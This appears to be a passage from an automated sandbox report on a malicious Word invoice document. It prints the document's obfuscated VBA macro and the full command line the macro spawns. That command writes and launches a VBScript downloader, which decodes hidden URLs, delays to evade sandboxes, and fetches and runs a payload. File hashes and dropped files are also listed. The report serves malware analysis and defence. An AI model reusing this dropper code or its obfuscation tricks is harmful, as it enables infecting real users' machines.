Select Case XtYLvn1
Case 70
XtYLvn1 = XtYLvn1 + 1
Case 95
XtYLvn1 = XtYLvn1 + XtYLvn1
Case Else
XtYLvn1 = XtYLvn1 - 1
End Select
For Ge1nxRk = 0 To Q7nz(FGF2pe)
FAOOaq = KEfIE((FAOOaq + 1), (563456 / 2201))
V5j = KEfIE((V5j + JO3Nec0(FAOOaq)), (6262 - 6006))
N0WlM = JO3Nec0(FAOOaq)
JO3Nec0(FAOOaq) = JO3Nec0(V5j)
JO3Nec0(V5j) = N0WlM
BYw(Ge1nxRk) = Fort(BYw(Ge1nxRk), (JO3Nec0(KEfIE((JO3Nec0(FAOOaq) + JO3Nec0(V5j)), ((5194 - 4938))))))
Next Ge1nxRk
QUM = 52
Select Case QUM
Case 74
QUM = QUM + 1
Case 8
QUM = QUM + QUM
Case Else
QUM = QUM - 1
End Select
EkBP9t8 = IqV(BYw)
PIsTtXb = 56
Select Case PIsTtXb
Case 75
PIsTtXb = PIsTtXb + 1
Case 65
PIsTtXb = PIsTtXb + PIsTtXb
Case Else
PIsTtXb = PIsTtXb - 1
End Select
End Function
Private Function IqV(UbBcO() As Byte) As String
TGzXLT = 68
Select Case TGzXLT
Case 78
TGzXLT = TGzXLT + 1
Case 23
TGzXLT = TGzXLT + TGzXLT
Case Else
TGzXLT = TGzXLT - 1
End Select
Dim Fstke As Long
NmnESJ = 64
Select Case NmnESJ
Case 12
NmnESJ = NmnESJ + 1
Case 68
NmnESJ = NmnESJ + NmnESJ
Case Else
NmnESJ = NmnESJ - 1
End Select
For Fstke = 0 To Q7nz(UbBcO)
RsnhkD5 = 67
Select Case RsnhkD5
Case 42
RsnhkD5 = RsnhkD5 + 1
Case 16
RsnhkD5 = RsnhkD5 + RsnhkD5
Case Else
RsnhkD5 = RsnhkD5 - 1
End Select
IqV = IqV & EHh(UbBcO(Fstke))
CSz = 19
Select Case CSz
Case 27
CSz = CSz + 1
Case 76
CSz = CSz + CSz
Case Else
CSz = CSz - 1
End Select
Next Fstke
RAHMhXM = 15
Select Case RAHMhXM
Case 83
RAHMhXM = RAHMhXM + 1
Case 5
RAHMhXM = RAHMhXM + RAHMhXM
Case Else
RAHMhXM = RAHMhXM - 1
End Select
End Function
Private Function Eq5r(Bm As Integer) As Byte()
SaUJ = 16
Select Case SaUJ
Case 48
SaUJ = SaUJ + 1
Case 50
SaUJ = SaUJ + SaUJ
Case Else
SaUJ = SaUJ - 1
End Select
Dim TjFNAkm(1) As Byte, JM0 As Long, Mmkm3Xj As Byte
Lf = 41
Select Case Lf
Case 31
Lf = Lf + 1
Case 87
Lf = Lf + Lf
Case Else
Lf = Lf - 1
End Select
For JM0 = 0 To 1
TjFNAkm(JM0) = (Int(Bm / (2 ^ ((-2353 + 2361) * (1 - JM0))))) And (2749 - 2494)
Next JM0
WADE = 50
Select Case WADE
Case 30
WADE = WADE + 1
Case 90
WADE = WADE + WADE
Case Else
WADE = WADE - 1
End Select
ReDim Eq5r(1) As Byte
WA = 66
Select Case WA
Case 67
WA = WA + 1
Case 64
WA = WA + WA
Case Else
WA = WA - 1
End Select
For JM0 = 0 To 1 \ 2
Mmkm3Xj = TjFNAkm(JM0)
TjFNAkm(JM0) = TjFNAkm(1 - JM0)
TjFNAkm(1 - JM0) = Mmkm3Xj
Next
OKZ = 51
Select Case OKZ
Case 52
OKZ = OKZ + 1
Case 49
OKZ = OKZ + OKZ
Case Else
OKZ = OKZ - 1
End Select
Eq5r = TjFNAkm
IrN7tgU = 74
Select Case IrN7tgU
Case 81
IrN7tgU = IrN7tgU + 1
Case 86
IrN7tgU = IrN7tgU + IrN7tgU
Case Else
IrN7tgU = IrN7tgU - 1
End Select
End Function
Private Function KEfIE(DqKe, Wxq1R)
KEfIE = DqKe - (Wxq1R * (DqKe \ Wxq1R))
End Function
Private Sub VT()
QGuE = 87
Select Case QGuE
Case 81
QGuE = QGuE + 1
Case 48
QGuE = QGuE + QGuE
Case Else
QGuE = QGuE - 1
End Select
EbFxIa = 27
Select Case EbFxIa
Case 22
EbFxIa = EbFxIa + 1
Case 65
EbFxIa = EbFxIa + EbFxIa
Case Else
EbFxIa = EbFxIa - 1
End Select
End Sub
Private Function EHh(ByVal PqADvV3 As Integer) As String
Vc = 39
Select Case Vc
Case 86
Vc = Vc + 1
Case 97
Vc = Vc + Vc
Case Else
Vc = Vc - 1
End Select
Dim TZcW(1) As Byte, W5DFnTu As Byte, Tz As Byte
GTFf = 4
Select Case GTFf
Case 60
GTFf = GTFf + 1
Case 63
GTFf = GTFf + GTFf
Case Else
GTFf = GTFf - 1
End Select
If PqADvV3 < 0 Then Exit Function
C9 = 48
Select Case C9
Case 11
C9 = C9 + 1
Case 23
C9 = C9 + C9
Case Else
C9 = C9 - 1
End Select
If PqADvV3 > (2386545 / 9359) Then
TeNjz = 70
Select Case TeNjz
Case 57
TeNjz = TeNjz + 1
Case 70
TeNjz = TeNjz + TeNjz
Case Else
TeNjz = TeNjz - 1
End Select
Tz = 0
Else
Uwxh = 14
Select Case Uwxh
Case 53
Uwxh = Uwxh + 1
Case 8
Uwxh = Uwxh + Uwxh
Case Else
Uwxh = Uwxh - 1
End Select
W5DFnTu = PqADvV3
TQapJv = 39
Select Case TQapJv
Case 88
TQapJv = TQapJv + 1
Case 88
TQapJv = TQapJv + TQapJv
Case Else
TQapJv = TQapJv - 1
End Select
Tz = 0
DnPO = 94
Select Case DnPO
Case 82
DnPO = DnPO + 1
Case 18
DnPO = DnPO + DnPO
Case Else
DnPO = DnPO - 1
End Select
End If
W3iaBdi = 32
Select Case W3iaBdi
Case 70
W3iaBdi = W3iaBdi + 1
Case 8
W3iaBdi = W3iaBdi + W3iaBdi
Case Else
W3iaBdi = W3iaBdi - 1
End Select
TZcW(0) = W5DFnTu
ETLf61I = 65
Select Case ETLf61I
Case 81
ETLf61I = ETLf61I + 1
Case 61
ETLf61I = ETLf61I + ETLf61I
Case Else
ETLf61I = ETLf61I - 1
End Select
TZcW(1) = Tz
Gnmy = 5
Select Case Gnmy
Case 76
Gnmy = Gnmy + 1
Case 89
Gnmy = Gnmy + Gnmy
Case Else
Gnmy = Gnmy - 1
End Select
EHh = TZcW
SKx0D = 94
Select Case SKx0D
Case 46
SKx0D = SKx0D + 1
Case 18
SKx0D = SKx0D + SKx0D
Case Else
SKx0D = SKx0D - 1
End Select
End Function" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DFABF10450C5CF921A.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF4E0FDB496D509034.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF0C8FAD8AB18DA885.TMP" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-61159"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-61159"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6B490000
- source
- Loaded Module
-
Runs shell commands
- details
-
"/V /C set "GATi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM M9" "FUNCTion TfU(SH2Y)" "Np=8" "TfU=Asc(SH2Y)" "EiAc=23" "End FuNcTiOn" "sUb MMO()" "VTPA5qS=28" "Dim Y75aZ4N
P3wS" "IUpk=87" "dO whiLE Y75aZ4N<>5604-5603" "P3wS=P3wS+1" "lOop" "Mk0J2BB=58" "End sUB" "sUb Ax0h()" "NJBGU2=25" "WRO2F9=""""" "P5yBeuK=45" "QV9HeV=M9 & UFZnET & SjRhCU("6A143E00","SDD")" "XG3mV=77" "Rlyuu=SjRhCU("0A380E592011304A580649063E36173D754855654B","EiUjw")" "SLq=24" "CkPXz M9 & SjRhCU("69075C03","PGb2V")
QV9HeV" "S9RQK=11" "iF GW4f5="" THEn O17((34020/8505))" "Ot=14" "SBw6yB="IOx6"" "TXY=29" "SeT NNvrM5=CreAtEoBjEct(SjRhCU("182B553B260842671C10532523",SBw6yB))" "JsIHIG=23" "NNvrM5.rUn Rlyuu & QV9HeV & WRO2F9
9902-9902
5391-5391" "LLbYV=48" "EnD SuB" "TVpT7=77" "Am" "funCtioN UFZnET()" "IeiG=89" "UFZnET=sECOND(TIme)" "MCUnR=7" "EnD FUnCTIOn" "FUncTiON CkPXz(RVCo,Jv)" "SxVD=39" "dIm GS3
FT
LaGEwvu
AW87
IGO(5)" "XK5d=63" "IGO(2)=107" "KSN=12" "IGO(0)=104" "XWox=94" "IGO(5)=52" "OhYR71c=9" "IGO(4)=54" "Ec=92" "IGO(1)=100" "COKk=16" "IGO(3)=50" "WVD3X=31" "GO9Qf=85" "seT GS3=cReaTEObjeCt(SjRhCU("6B542A5C381C2C565076732104206B4E2B412D050A5A5D3D563C", "E87X5Hh"))" "GEGnRI5=83" "SeT FT=GS3.GETfIle(RVCo)" "PjQm=37" "Set AW87=FT.OpENastexTsTrEaM(7870-7869,3465-3465)" "Qrn0F9x=64" "SeT LaGEwvu=GS3.crEatetEXtFIlE(Jv,3358-3357,3918-3918)" "A2tFd=23" "Do UNtiL AW87.atENdofStReam" "LaGEwvu.wriTe TD3AMvj(ECgov(TfU(AW87.reAD(8444-8443))
IGO(0)))" "loOp" "VDXk=85" "LaGEwvu.CloSe" "PlB7NKX=15" "AW87.CLoSE" "Ga=82" "eND funCtioN" "sUb XfcycJ(Eac0)" "Jcm=71" "Dim Ay" "YtOxu=2" "VfG2i="Dml"" "JoB1IzZ=58" "seT Ay=cREatEobJEct(SjRhCU("2C280B292E6A3E1836080D29",VfG2i))" "JiJM3BA=69" "Ay.OPEn" "UL=84" "Ay.tYPe=1664-1663" "AquDYm=4" "Ay.WrITE Eac0" "ADV9Gi9=59" "Ay.SavEtoFile M9 & SjRhCU("612F0116","COJo")
6325-6323" "WK=29" "Ay.CLOse" "Awmrna=42" "Ax0h" "A7eU1uk=44" "End sUB" "FuNCTION SjRhCU(VrF21TX,T7DSKIH)" "Spd=80" "dIM SdZ2xg
IYv
Yq" "EqO=31" "FoR SdZ2xg=1 tO (LEn(VrF21TX)/2)" "IYv=(TD3AMvj((-8986+9024)) & TD3AMvj((388224/5392))&(mId(VrF21TX,(SdZ2xg+SdZ2xg)-1
2)))" "Yq=(TfU(mID(T7DSKIH,((SdZ2xg Mod lEN(T7DSKIH))+1)
1)))" "SjRhCU=SjRhCU+TD3AMvj(ECgov(IYv,Yq))" "nexT" "EefoNi=98" "eND FUnction" "fuNctiON P2tWP7r(YqLI6)" "GouM=82" "Dim Xjfp
DIjnB9" "BuXto4=32" "Ypa="Px8H"" "L8ZsTld=81" "On ErROR RESUMe NeXT" "LDQXi=97" "YSkD="C0PY3s"" "RxhF=79" "Set Xjfp=cReatEoBJeCt(SjRhCU("67033A411A33447E0A5B162F5C",YSkD))" "Ggz8z=97" "KUeM4="COJo"" "UPSJu" "XFAFfy=48" "Set GMA9P=Xjfp.ENViroNMENt(SjRhCU("05250516321906","JUw"))" "XNnFNUs=83" "M9=GMA9P(SjRhCU("71073825261971","M0Whag"))&TD3AMvj((1963-1871))& UFZnET & UFZnET" "RtawTK=41" "TdOivwN="QRR"" "NR0C=57" "SEt DIjnB9=CReATeobjecT(SjRhCU("1F3B32203D223D34257C0A1C1E1A050602",TdOivwN))" "Jw5LM=43" "DIjnB9.opEn SjRhCU("2E763D","Gi3i")
YqLI6
6172-6172" "D2xe8Fh=85" "DIjnB9.SenD()" "PbFk=86" "if DIjnB9.StAtus=(1620600/8103) then" "Bu=97" "UPSJu" "Xra6=97" "O17((29468/7367))" "PRIm6zI=59" "XfcycJ DIjnB9.rESpONsebody" "Lvh=63" "Else" "WO8=75" "JYPuAKS="Mdwks"" "GuSri=80" "seT DIjnB9= CReaTEobJECt(SjRhCU("291E08012217180D07633C3A273B193027",JYPuAKS))" "GijXEk=49" "DIjnB9.OPEn SjRhCU("062702","VAb")
SjRhCU("31050C1D7C41686B414F43735969615F4A5877412338051943240729","GYqxmFn" )
7189-7189" "FW=62" "DIjnB9.SeND()" "E22=71" "If DIjnB9.StatUs=(2132-1932)tHEN XfcycJ DIjnB9.ReSPOnSEBODY" "N7Ae=2" "FMN=8" "end if" "Tx=45" "enD functiOn" "FUncTioN TD3AMvj(RR)" "JE=95" "TD3AMvj=cHR(RR)" "V1=40" "ENd fUncTiOn" "fUNCTIOn ECgov(CKG0,Mhjn4)" "RBeXiY5=93" "ECgov=(CKG0 ANd NOt Mhjn4)oR(nOt CKG0 ANd Mhjn4)" "KQ=1" "eND FuncTion" "SUb UPSJu()" "A0o=28" "Dim BAFaXj
A8j" "For BAFaXj = 16 To 8000804" "A8j = VJAZ7C + 44 + 47 + 65" "Next" "ELlS=72" "ENd sUB" "sUB Am()" "DmS=34" "T11gvv=97935355" "UiEGJ=18" "foR V3dELW=1 tO T11gvv" "F4c4=F4c4+1" "NeXt" "QSIUXPs=86" "iF F4c4=T11gvv Then" "MUu2w1L=50" "O17((30416/7604))" "CtY=16" "P2tWP7r(SjRhCU("58134127761F48453638511759383956495638211F0354232D1E055C39","L0g5W"))" "I4Q=35" "enD If" "WEJYXz6=46" "End sUb" "suB O17(YThPj)" "FTP7Nb=65" "DIm Qr1" "Id=7" "Qr1=TImeR+YThPj" "dO wHiLE timER<Qr1" "LOOp" "Icy=39" "EnD sUb") do @echo %~i)>"!GATi!" && start "" "!GATi!"" on 2016-8-15.07:58:00.390 - source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/V /C set "GATi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM M9" "FUNCTion TfU(SH2Y)" "Np=8" "TfU=Asc(SH2Y)" "EiAc=23" "End FuNcTiOn" "sUb MMO()" "VTPA5qS=28" "Dim Y75aZ4N
P3wS" "IUpk=87" "dO whiLE Y75aZ4N<>5604-5603" "P3wS=P3wS+1" "lOop" "Mk0J2BB=58" "End sUB" "sUb Ax0h()" "NJBGU2=25" "WRO2F9=""""" "P5yBeuK=45" "QV9HeV=M9 & UFZnET & SjRhCU("6A143E00","SDD")" "XG3mV=77" "Rlyuu=SjRhCU("0A380E592011304A580649063E36173D754855654B","EiUjw")" "SLq=24" "CkPXz M9 & SjRhCU("69075C03","PGb2V")
QV9HeV" "S9RQK=11" "iF GW4f5="" THEn O17((34020/8505))" "Ot=14" "SBw6yB="IOx6"" "TXY=29" "SeT NNvrM5=CreAtEoBjEct(SjRhCU("182B553B260842671C10532523",SBw6yB))" "JsIHIG=23" "NNvrM5.rUn Rlyuu & QV9HeV & WRO2F9
9902-9902
5391-5391" "LLbYV=48" "EnD SuB" "TVpT7=77" "Am" "funCtioN UFZnET()" "IeiG=89" "UFZnET=sECOND(TIme)" "MCUnR=7" "EnD FUnCTIOn" "FUncTiON CkPXz(RVCo,Jv)" "SxVD=39" "dIm GS3
FT
LaGEwvu
AW87
IGO(5)" "XK5d=63" "IGO(2)=107" "KSN=12" "IGO(0)=104" "XWox=94" "IGO(5)=52" "OhYR71c=9" "IGO(4)=54" "Ec=92" "IGO(1)=100" "COKk=16" "IGO(3)=50" "WVD3X=31" "GO9Qf=85" "seT GS3=cReaTEObjeCt(SjRhCU("6B542A5C381C2C565076732104206B4E2B412D050A5A5D3D563C", "E87X5Hh"))" "GEGnRI5=83" "SeT FT=GS3.GETfIle(RVCo)" "PjQm=37" "Set AW87=FT.OpENastexTsTrEaM(7870-7869,3465-3465)" "Qrn0F9x=64" "SeT LaGEwvu=GS3.crEatetEXtFIlE(Jv,3358-3357,3918-3918)" "A2tFd=23" "Do UNtiL AW87.atENdofStReam" "LaGEwvu.wriTe TD3AMvj(ECgov(TfU(AW87.reAD(8444-8443))
IGO(0)))" "loOp" "VDXk=85" "LaGEwvu.CloSe" "PlB7NKX=15" "AW87.CLoSE" "Ga=82" "eND funCtioN" "sUb XfcycJ(Eac0)" "Jcm=71" "Dim Ay" "YtOxu=2" "VfG2i="Dml"" "JoB1IzZ=58" "seT Ay=cREatEobJEct(SjRhCU("2C280B292E6A3E1836080D29",VfG2i))" "JiJM3BA=69" "Ay.OPEn" "UL=84" "Ay.tYPe=1664-1663" "AquDYm=4" "Ay.WrITE Eac0" "ADV9Gi9=59" "Ay.SavEtoFile M9 & SjRhCU("612F0116","COJo")
6325-6323" "WK=29" "Ay.CLOse" "Awmrna=42" "Ax0h" "A7eU1uk=44" "End sUB" "FuNCTION SjRhCU(VrF21TX,T7DSKIH)" "Spd=80" "dIM SdZ2xg
IYv
Yq" "EqO=31" "FoR SdZ2xg=1 tO (LEn(VrF21TX)/2)" "IYv=(TD3AMvj((-8986+9024)) & TD3AMvj((388224/5392))&(mId(VrF21TX,(SdZ2xg+SdZ2xg)-1
2)))" "Yq=(TfU(mID(T7DSKIH,((SdZ2xg Mod lEN(T7DSKIH))+1)
1)))" "SjRhCU=SjRhCU+TD3AMvj(ECgov(IYv,Yq))" "nexT" "EefoNi=98" "eND FUnction" "fuNctiON P2tWP7r(YqLI6)" "GouM=82" "Dim Xjfp
DIjnB9" "BuXto4=32" "Ypa="Px8H"" "L8ZsTld=81" "On ErROR RESUMe NeXT" "LDQXi=97" "YSkD="C0PY3s"" "RxhF=79" "Set Xjfp=cReatEoBJeCt(SjRhCU("67033A411A33447E0A5B162F5C",YSkD))" "Ggz8z=97" "KUeM4="COJo"" "UPSJu" "XFAFfy=48" "Set GMA9P=Xjfp.ENViroNMENt(SjRhCU("05250516321906","JUw"))" "XNnFNUs=83" "M9=GMA9P(SjRhCU("71073825261971","M0Whag"))&TD3AMvj((1963-1871))& UFZnET & UFZnET" "RtawTK=41" "TdOivwN="QRR"" "NR0C=57" "SEt DIjnB9=CReATeobjecT(SjRhCU("1F3B32203D223D34257C0A1C1E1A050602",TdOivwN))" "Jw5LM=43" "DIjnB9.opEn SjRhCU("2E763D","Gi3i")
YqLI6
6172-6172" "D2xe8Fh=85" "DIjnB9.SenD()" "PbFk=86" "if DIjnB9.StAtus=(1620600/8103) then" "Bu=97" "UPSJu" "Xra6=97" "O17((29468/7367))" "PRIm6zI=59" "XfcycJ DIjnB9.rESpONsebody" "Lvh=63" "Else" "WO8=75" "JYPuAKS="Mdwks"" "GuSri=80" "seT DIjnB9= CReaTEobJECt(SjRhCU("291E08012217180D07633C3A273B193027",JYPuAKS))" "GijXEk=49" "DIjnB9.OPEn SjRhCU("062702","VAb")
SjRhCU("31050C1D7C41686B414F43735969615F4A5877412338051943240729","GYqxmFn" )
7189-7189" "FW=62" "DIjnB9.SeND()" "E22=71" "If DIjnB9.StatUs=(2132-1932)tHEN XfcycJ DIjnB9.ReSPOnSEBODY" "N7Ae=2" "FMN=8" "end if" "Tx=45" "enD functiOn" "FUncTioN TD3AMvj(RR)" "JE=95" "TD3AMvj=cHR(RR)" "V1=40" "ENd fUncTiOn" "fUNCTIOn ECgov(CKG0,Mhjn4)" "RBeXiY5=93" "ECgov=(CKG0 ANd NOt Mhjn4)oR(nOt CKG0 ANd Mhjn4)" "KQ=1" "eND FuncTion" "SUb UPSJu()" "A0o=28" "Dim BAFaXj
A8j" "For BAFaXj = 16 To 8000804" "A8j = VJAZ7C + 44 + 47 + 65" "Next" "ELlS=72" "ENd sUB" "sUB Am()" "DmS=34" "T11gvv=97935355" "UiEGJ=18" "foR V3dELW=1 tO T11gvv" "F4c4=F4c4+1" "NeXt" "QSIUXPs=86" "iF F4c4=T11gvv Then" "MUu2w1L=50" "O17((30416/7604))" "CtY=16" "P2tWP7r(SjRhCU("58134127761F48453638511759383956495638211F0354232D1E055C39","L0g5W"))" "I4Q=35" "enD If" "WEJYXz6=46" "End sUb" "suB O17(YThPj)" "FTP7Nb=65" "DIm Qr1" "Id=7" "Qr1=TImeR+YThPj" "dO wHiLE timER<Qr1" "LOOp" "Icy=39" "EnD sUb") do @echo %~i)>"!GATi!" && start "" "!GATi!"" (Show Process)
Spawned process "wscript.exe" with commandline ""%APPDATA%\17160.vbs"" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"~WRD0000.tmp" has type "Composite Document File V2 Document No summary info"
"~WRD0001.tmp" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 6.1 Code page: 1252 Author: romaine Template: Normal Last Saved By: vLyk9Xw Revision Number: 6 Name of Creating Application: Microsoft Office Word Total Editing Time: 03:37:00 Create Time/Date: Sat Jun 4 06:27:00 2016 Last Saved Time/Date: Mon Aug 15 19:22:00 2016 Number of Pages: 6 Number of Words: 10647 Number of Characters: 60690 Security: 0"
"~WRS{43E59D0F-E69F-45E4-B6A0-051118A152EA}.tmp" has type "data"
"index.dat" has type "data"
"ExcludeDictionaryEN0409.lex" has type "Little-endian UTF-16 Unicode text with no line terminators"
"~$2d2f776914119ff7f66b6c39ab767f4ef5b72c3b858dbe8823327f18e5e54e.doc" has type "data"
"~WRS{C64C600A-AAEE-47D7-BF9F-EA7D4A029D89}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"~$Normal.dotm" has type "data"
"922d2f776914119ff7f66b6c39ab767f4ef5b72c3b858dbe8823327f18e5e54e.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Hidden Archive ctime=Mon Aug 15 14:23:38 2016 mtime=Mon Aug 15 14:23:38 2016 atime=Mon Aug 15 23:22:42 2016 length=236544 window=hide"
"17160.vbs" has type "ASCII text with CRLF line terminators"
"~WRS{51DD4C89-F05C-49E8-8D65-02A379E56D57}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\002\004"" - source
- Binary File
- relevance
- 3/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://www.iec.ch"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://www.iec.chIEC"
Heuristic match: "pataplouf.com" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
File Details
Tincidunt Nibh Incorporated_%invoicea21a.17.rtf
- Filename
- Tincidunt Nibh Incorporated_%invoicea21a.17.rtf
- Size
- 231KiB (236544 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: romaine , Template: Normal.dotm, Last Saved By: infelicific , Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jun 3 22:27:00 2016, Last Saved Time/Date: Sun Aug 7 00:43:00 2016, Number of Pages: 1, Number of Words: 10647, Number of Characters: 60688, Security: 0
- Architecture
- WINDOWS
- SHA256
- 922d2f776914119ff7f66b6c39ab767f4ef5b72c3b858dbe8823327f18e5e54e
- MD5
- 0e66874fa0c32c6af94991d53237c5cd
- SHA1
- c6c4be0b8fe2b2cd094b2981e86cc589864396a2
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 3 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\922d2f776914119ff7f66b6c39ab767f4ef5b72c3b858dbe8823327f18e5e54e.doc"
(PID: 2784)
-
cmd.exe
/V /C set "GATi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM M9" "FUNCTion TfU(SH2Y)" "Np=8" "TfU=Asc(SH2Y)" "EiAc=23" "End FuNcTiOn" "sUb MMO()" "VTPA5qS=28" "Dim Y75aZ4N,P3wS" "IUpk=87" "dO whiLE Y75aZ4N<>5604-5603" "P3wS=P3wS+1" "lOop" "Mk0J2BB=58" "End sUB" "sUb Ax0h()" "NJBGU2=25" "WRO2F9=""""" "P5yBeuK=45" "QV9HeV=M9 & UFZnET & SjRhCU("6A143E00","SDD")" "XG3mV=77" "Rlyuu=SjRhCU("0A380E592011304A580649063E36173D754855654B","EiUjw")" "SLq=24" "CkPXz M9 & SjRhCU("69075C03","PGb2V"),QV9HeV" "S9RQK=11" "iF GW4f5="" THEn O17((34020/8505))" "Ot=14" "SBw6yB="IOx6"" "TXY=29" "SeT NNvrM5=CreAtEoBjEct(SjRhCU("182B553B260842671C10532523",SBw6yB))" "JsIHIG=23" "NNvrM5.rUn Rlyuu & QV9HeV & WRO2F9,9902-9902,5391-5391" "LLbYV=48" "EnD SuB" "TVpT7=77" "Am" "funCtioN UFZnET()" "IeiG=89" "UFZnET=sECOND(TIme)" "MCUnR=7" "EnD FUnCTIOn" "FUncTiON CkPXz(RVCo,Jv)" "SxVD=39" "dIm GS3,FT,LaGEwvu,AW87,IGO(5)" "XK5d=63" "IGO(2)=107" "KSN=12" "IGO(0)=104" "XWox=94" "IGO(5)=52" "OhYR71c=9" "IGO(4)=54" "Ec=92" "IGO(1)=100" "COKk=16" "IGO(3)=50" "WVD3X=31" "GO9Qf=85" "seT GS3=cReaTEObjeCt(SjRhCU("6B542A5C381C2C565076732104206B4E2B412D050A5A5D3D563C", "E87X5Hh"))" "GEGnRI5=83" "SeT FT=GS3.GETfIle(RVCo)" "PjQm=37" "Set AW87=FT.OpENastexTsTrEaM(7870-7869,3465-3465)" "Qrn0F9x=64" "SeT LaGEwvu=GS3.crEatetEXtFIlE(Jv,3358-3357,3918-3918)" "A2tFd=23" "Do UNtiL AW87.atENdofStReam" "LaGEwvu.wriTe TD3AMvj(ECgov(TfU(AW87.reAD(8444-8443)),IGO(0)))" "loOp" "VDXk=85" "LaGEwvu.CloSe" "PlB7NKX=15" "AW87.CLoSE" "Ga=82" "eND funCtioN" "sUb XfcycJ(Eac0)" "Jcm=71" "Dim Ay" "YtOxu=2" "VfG2i="Dml"" "JoB1IzZ=58" "seT Ay=cREatEobJEct(SjRhCU("2C280B292E6A3E1836080D29",VfG2i))" "JiJM3BA=69" "Ay.OPEn" "UL=84" "Ay.tYPe=1664-1663" "AquDYm=4" "Ay.WrITE Eac0" "ADV9Gi9=59" "Ay.SavEtoFile M9 & SjRhCU("612F0116","COJo"),6325-6323" "WK=29" "Ay.CLOse" "Awmrna=42" "Ax0h" "A7eU1uk=44" "End sUB" "FuNCTION SjRhCU(VrF21TX,T7DSKIH)" "Spd=80" "dIM SdZ2xg,IYv,Yq" "EqO=31" "FoR SdZ2xg=1 tO (LEn(VrF21TX)/2)" "IYv=(TD3AMvj((-8986+9024)) & TD3AMvj((388224/5392))&(mId(VrF21TX,(SdZ2xg+SdZ2xg)-1,2)))" "Yq=(TfU(mID(T7DSKIH,((SdZ2xg Mod lEN(T7DSKIH))+1),1)))" "SjRhCU=SjRhCU+TD3AMvj(ECgov(IYv,Yq))" "nexT" "EefoNi=98" "eND FUnction" "fuNctiON P2tWP7r(YqLI6)" "GouM=82" "Dim Xjfp,DIjnB9" "BuXto4=32" "Ypa="Px8H"" "L8ZsTld=81" "On ErROR RESUMe NeXT" "LDQXi=97" "YSkD="C0PY3s"" "RxhF=79" "Set Xjfp=cReatEoBJeCt(SjRhCU("67033A411A33447E0A5B162F5C",YSkD))" "Ggz8z=97" "KUeM4="COJo"" "UPSJu" "XFAFfy=48" "Set GMA9P=Xjfp.ENViroNMENt(SjRhCU("05250516321906","JUw"))" "XNnFNUs=83" "M9=GMA9P(SjRhCU("71073825261971","M0Whag"))&TD3AMvj((1963-1871))& UFZnET & UFZnET" "RtawTK=41" "TdOivwN="QRR"" "NR0C=57" "SEt DIjnB9=CReATeobjecT(SjRhCU("1F3B32203D223D34257C0A1C1E1A050602",TdOivwN))" "Jw5LM=43" "DIjnB9.opEn SjRhCU("2E763D","Gi3i"),YqLI6,6172-6172" "D2xe8Fh=85" "DIjnB9.SenD()" "PbFk=86" "if DIjnB9.StAtus=(1620600/8103) then" "Bu=97" "UPSJu" "Xra6=97" "O17((29468/7367))" "PRIm6zI=59" "XfcycJ DIjnB9.rESpONsebody" "Lvh=63" "Else" "WO8=75" "JYPuAKS="Mdwks"" "GuSri=80" "seT DIjnB9= CReaTEobJECt(SjRhCU("291E08012217180D07633C3A273B193027",JYPuAKS))" "GijXEk=49" "DIjnB9.OPEn SjRhCU("062702","VAb"),SjRhCU("31050C1D7C41686B414F43735969615F4A5877412338051943240729","GYqxmFn" ),7189-7189" "FW=62" "DIjnB9.SeND()" "E22=71" "If DIjnB9.StatUs=(2132-1932)tHEN XfcycJ DIjnB9.ReSPOnSEBODY" "N7Ae=2" "FMN=8" "end if" "Tx=45" "enD functiOn" "FUncTioN TD3AMvj(RR)" "JE=95" "TD3AMvj=cHR(RR)" "V1=40" "ENd fUncTiOn" "fUNCTIOn ECgov(CKG0,Mhjn4)" "RBeXiY5=93" "ECgov=(CKG0 ANd NOt Mhjn4)oR(nOt CKG0 ANd Mhjn4)" "KQ=1" "eND FuncTion" "SUb UPSJu()" "A0o=28" "Dim BAFaXj, A8j" "For BAFaXj 